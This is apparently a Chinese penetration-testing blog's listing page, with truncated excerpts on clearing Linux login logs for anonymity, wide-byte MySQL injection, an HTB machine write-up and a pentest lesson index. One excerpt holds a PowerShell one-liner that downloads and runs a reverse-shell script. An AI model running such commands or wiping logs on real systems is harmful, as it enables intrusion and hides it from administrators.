渗透周边

清理痕迹

清理痕迹

lsh4ck 6年前 354 0

Linux相关: Linux 系统有三个标准的显示用户最近登陆信息的命令: last, lastb, lastlog 这些命令的输出信息包括登录用户名,最近登陆时间,IP地址等。 为了更好的保持匿名,可以清除信息 last 命令 对应日志文件 /var/log/wtmp: 成功登...

8、利用宽字节特性注入mysql

8、利用宽字节特性注入mysql 12

lsh4ck 6年前 186 0

因为手里暂时也没什么现成的实际案例,所以就暂时先用demo简单演示下完整的宽字节注入流程,虽然是本地环境,但跟实战中其实并没太大差别,大家大可不用太过纠结,宽字节注入原型代码,如下: 当我们尝试经典的‘,一眼望去,貌似什么都没发生,把sql打出来sql才知道,原来’已经被adds...

Get shell By Powershell

Get shell By Powershell

lsh4ck 6年前 266 0

Invoke-PowerShellTcp.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/s...

HTB-靶机Zipper-writeup

HTB-靶机Zipper-writeup 18

lsh4ck 6年前 473 0

Usually scan,nmap+dirb+gobuster+msftcp find zabbix,ver3.0.21: think about zabbix has jsrpc.php,any exploit?,json interface is not authorized...

亮神专辑,全部收录到博客,方便自己和墙内用户查看

亮神专辑,全部收录到博客,方便自己和墙内用户查看

lsh4ck 6年前 6,298 0

致敬亮神原创 亮神专辑项目地址 亮神专辑gitbook 致敬k神原创——老博客 致敬k神原创-新站 第一课:windows提权-快速查找exp 第二课:Linux提权-依赖exp篇 第三课:Delphi代码审计--项目实战1 第四课:Asp代码审计--项目实战2 第五课:工具介绍...

扫一扫二维码分享